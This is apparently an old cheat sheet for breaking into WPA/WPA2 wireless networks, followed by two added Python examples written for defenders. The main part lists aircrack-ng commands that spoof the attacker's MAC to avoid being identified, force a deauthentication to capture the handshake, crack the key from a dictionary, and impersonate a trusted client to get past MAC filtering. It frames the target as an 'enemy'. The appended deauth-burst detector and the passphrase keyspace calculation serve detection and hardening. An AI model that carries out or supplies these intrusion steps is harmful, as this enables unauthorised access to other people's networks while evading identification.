Cellys WPA2 Hack en

This document provides instructions for hacking a WPA2/WPA protected wireless network using a brute force attack on the network password. It outlines the steps to identify the target wireless device and access point, put the device in monitor mode to capture network traffic, use airodump-ng to find an access point with connected clients, use aireplay-ng to force a client reconnect and capture the handshake, and then use aircrack-ng to crack the password by comparing the captured handshake to words in a dictionary file. Once the password is cracked, it explains how to connect to the hacked access point by spoofing a client's MAC address and setting the cracked password.

Uploaded by

M S
Copyright
© Attribution Non-Commercial (BY-NC)

WPA2/WPA Hack MAC filtered or not

Basics:

Software: BackTrack Remote Exploit V3
Download: http://www.remote-exploit.org
Chipset: ATHEROS (Cisco Aironet 802.11 a/b/g / NEC WarpStar WL54AG, Netgear WG311T)

Constellation:
- Boot from CD or HD with BT V3
- 64 MB free writeable Space
- 2 Shells (under Xwindows it's easier (startx))

If XWindows doesn't work, configure it with "xconf" or "xorgconfig --textmode"

Shortcuts:
- BT = BackTrack
- MAC = MAC Address
- AP = Accesspoint
- CL = Client
- IFC = Interface (here ath0 placeholder)
- FILE = Log file to store the packets
- CH = Channel
- DIC = Dictionary File (.dic or .txt)

Foreword:

This Hack is only working with the Brute Force method. My Core2Duo 3GHz hacks 420 Keys / Sec. It doesn't matter WPA or WPA2. For hacking it is the same. ONLY WPA2 encrypted as TKIP works. AES is incompatible!

General Conditions:
- Accesspoint with good Signal
- one Client, who is connected to the AP.
- A Dictionary File

Hack it !

1) Wireless Device identification
We want to know how our device is named in the System. Type "iwconfig". With Atheros Chipsets the devices are always called athX.

2) Fake that MAC! (optional)
First, we fake our own MAC address, so nobody can identify us any more.
ifconfig IFC hw ether 00:11:22:33:44:55

3) Turn on Monitor Mode
To get all the packages we put our device in "Promiscuous Mode". First we kill the monitor mode on the ath0 device and create a new monitor device over the wifi0 device. After we created the monitor device, we can use ath0.
airmon-ng stop ath0 (delete the monitor mode)
airmon-ng start wifi0 (start monitor mode on ath0)

4) What is online ? (SHELL 1)
Search some AP's with already connected Clients. (You can see them in the bottom half of the screen, called Stations and Clients.)
airodump-ng -w FILE IFC
CTRL - C

5) Choose your enemy (SHELL 1)
Please remember the MAC address of the AP you want to hack. Remember also the channel number of the AP you want to hack. Now we only want to collect the packages on that channel, and we want to store that traffic in a CAP-file. (DON'T USE the "--ivs" option!!)
airodump-ng -w FILE -c CH --bssid APMAC IFC

6) Waiting for a Handshake ! (SHELL 2)
Ok .. now we can wait for a Handshake. (You can see it in the airodump-ng window, SHELL 1.) The "enemy" doesn't notice anything. But this can take a long time. You have to wait for a client reconnect, from which you will get the handshake. But we can provoke a reconnect from a client. How can we provoke a reconnect? Easy... we tell the AP "Hello, I am the client, and I want to disconnect." The real Client thinks "Shiiit, I am disconnected.. I must reconnect immediately!" And we get the handshake we need and store it in SHELL 1. You can see it in the first line of SHELL 1. So, if you want to provoke a reconnect, type the following command more than once (wait 5-20s between).
aireplay-ng -0 1 -a AP_MAC -c CL_MAC IFC

7) Crack the key! (SHELL 1)
Ok ... we got the handshake. Let's crack it! We compare the stored handshake in the .cap file with the dictionary file.
aircrack-ng -0 -x2 -w DIC FILE.cap

8) Connect to the hacked AP (SHELL 2)
With a MAC filtered AP you have to set a trusted MAC address from a client on your own card.
ifconfig IFC down hw ether CL_MAC (maybe reset IFC first)

and then connect to the AP:

For Mouse Lovers:
wlassistant

For Shell Lovers:
iwconfig IFC essid AP_NAME_SSID mode Managed key s:KEY_ASCII
ifconfig IFC up
iwpriv IFC authmode 2 (to connect, LED flashing)
dhcpcd IFC (to get an IP Address)

2008 by Celly
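The forced-reconnect step (6) works by sending deauthentication frames in the AP's name to a connected client, which is exactly what a wireless IDS should alert on. The following is an added example written from the defender's side; it is not part of the original cheat sheet. It runs a simple sliding-window detector over a list of constructed frame records (the `Frame` type, the MAC addresses and the timestamps are all made up for the example) and flags any client that its own BSSID "disconnects" several times within a minute, the pattern produced by repeating the deauth command every 5-20 seconds.

```python
"""Detect repeated 802.11 deauthentication frames aimed at one client.

Added example (not from the original cheat sheet): a client that is
disconnected several times in a short window by its own AP is the
signal a wireless IDS should raise. The frame records below are
constructed sample data, not a capture from any real network.
"""
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    ts: float        # capture timestamp, seconds
    subtype: str     # "deauth", "data", "beacon", ...
    src: str         # transmitter MAC
    dst: str         # receiver MAC
    bssid: str       # BSSID the frame belongs to


def detect_deauth_bursts(frames, window_s=60.0, threshold=3):
    """Return one alert per (bssid, client) pair that receives at least
    `threshold` deauth frames inside any `window_s`-second sliding window.

    Only frames whose source is the BSSID itself count: that is what an
    AP-originated (or AP-impersonating) disconnect looks like on the air.
    """
    recent = defaultdict(deque)   # (bssid, client) -> timestamps in window
    alerted = set()
    alerts = []
    for f in sorted(frames, key=lambda fr: fr.ts):
        if f.subtype != "deauth" or f.src != f.bssid:
            continue
        key = (f.bssid, f.dst)
        q = recent[key]
        q.append(f.ts)
        while q and f.ts - q[0] > window_s:   # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                "bssid": f.bssid,
                "client": f.dst,
                "count": len(q),
                "first_ts": q[0],
                "last_ts": f.ts,
            })
    return alerts


# Constructed sample: AP aa:bb:cc:00:00:01 with two clients. Client ..:01 is
# deauthed three times roughly 10 s apart (the "repeat the command, wait
# 5-20 s" pattern); client ..:02 sees a single, ordinary deauth.
AP = "aa:bb:cc:00:00:01"
SAMPLE_FRAMES = [
    Frame(100.0, "beacon", AP, "ff:ff:ff:ff:ff:ff", AP),
    Frame(101.0, "data", "cc:cc:cc:00:00:01", AP, AP),
    Frame(102.0, "deauth", AP, "cc:cc:cc:00:00:01", AP),
    Frame(103.0, "deauth", AP, "cc:cc:cc:00:00:02", AP),
    Frame(113.0, "deauth", AP, "cc:cc:cc:00:00:01", AP),
    Frame(125.0, "deauth", AP, "cc:cc:cc:00:00:01", AP),
    Frame(126.0, "data", "cc:cc:cc:00:00:01", AP, AP),
]

if __name__ == "__main__":
    for a in detect_deauth_bursts(SAMPLE_FRAMES):
        print(f"ALERT {a['bssid']} deauthed {a['client']} {a['count']}x "
              f"between t={a['first_ts']} and t={a['last_ts']}")
```

The threshold and window are deliberately low: a legitimate AP rarely deauthenticates the same station more than once in a minute, so three hits is already a strong signal, while a single frame (client ..:02) stays below the bar. On a real capture the same logic would also reveal the 802.11 protection the page's method relies on being absent; management-frame protection (802.11w) makes forged deauth frames discardable in the first place.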

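The foreword's "420 Keys / Sec" and step 7's dictionary comparison both come down to one cost: WPA/WPA2-PSK derives the pairwise master key from the passphrase and SSID with PBKDF2-HMAC-SHA1 at 4096 iterations, and every candidate the cracker tries pays that price. The following added example (not from the original cheat sheet) derives a PMK with the standard library, checks it against the IEEE 802.11i test vector, and then turns the page's own rate into worst-case search times for a few passphrase policies. The policies and the 420 keys/s rate are assumptions for illustration; the point for a network owner is that the only variable under their control is the size of the space the dictionary has to cover.

```python
"""Why the dictionary attack succeeds, and what makes it fail.

Added example (not from the original cheat sheet). The PMK derivation is
the one defined in IEEE 802.11i; the rate and the passphrase policies
below are assumptions used only to put the page's figure in perspective.
"""
import hashlib


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2(HMAC-SHA1, passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def keyspace_size(alphabet_size: int, length: int) -> int:
    """Number of candidates a uniformly random passphrase can take."""
    return alphabet_size ** length


def seconds_to_exhaust(keyspace: int, keys_per_second: float) -> float:
    """Worst-case time to try every candidate at the given rate."""
    return keyspace / keys_per_second


def describe(seconds: float) -> str:
    """Human-readable duration for the comparison table."""
    year = 365.25 * 24 * 3600
    if seconds < 3600:
        return f"{seconds / 60:.1f} minutes"
    if seconds < year:
        return f"{seconds / 86400:.1f} days"
    return f"{seconds / year:.3g} years"


# Assumed rate: the page's own figure of 420 keys/s on a 2008-era CPU.
RATE = 420.0

# Passphrase policies to compare (assumed, illustrative).
POLICIES = {
    "word from a 1,000,000-entry wordlist": 1_000_000,
    "8 random lowercase letters": keyspace_size(26, 8),
    "8 random printable ASCII": keyspace_size(95, 8),
    "12 random letters+digits": keyspace_size(62, 12),
    "4 words from a 7,776-word diceware list": keyspace_size(7776, 4),
}

if __name__ == "__main__":
    # IEEE 802.11i Annex test vector: passphrase "password", SSID "IEEE".
    print("PMK(password, IEEE) =", wpa_pmk("password", "IEEE").hex())
    for name, size in POLICIES.items():
        print(f"{name:42s} {describe(seconds_to_exhaust(size, RATE))}")
```

The wordlist row is what the page's method exploits: a million candidates fall in under an hour at the page's rate, and modern GPUs are orders of magnitude faster. The random-passphrase rows are why the same method stalls indefinitely on a properly chosen key; the 4096-iteration derivation does not change that ratio, it only sets the constant.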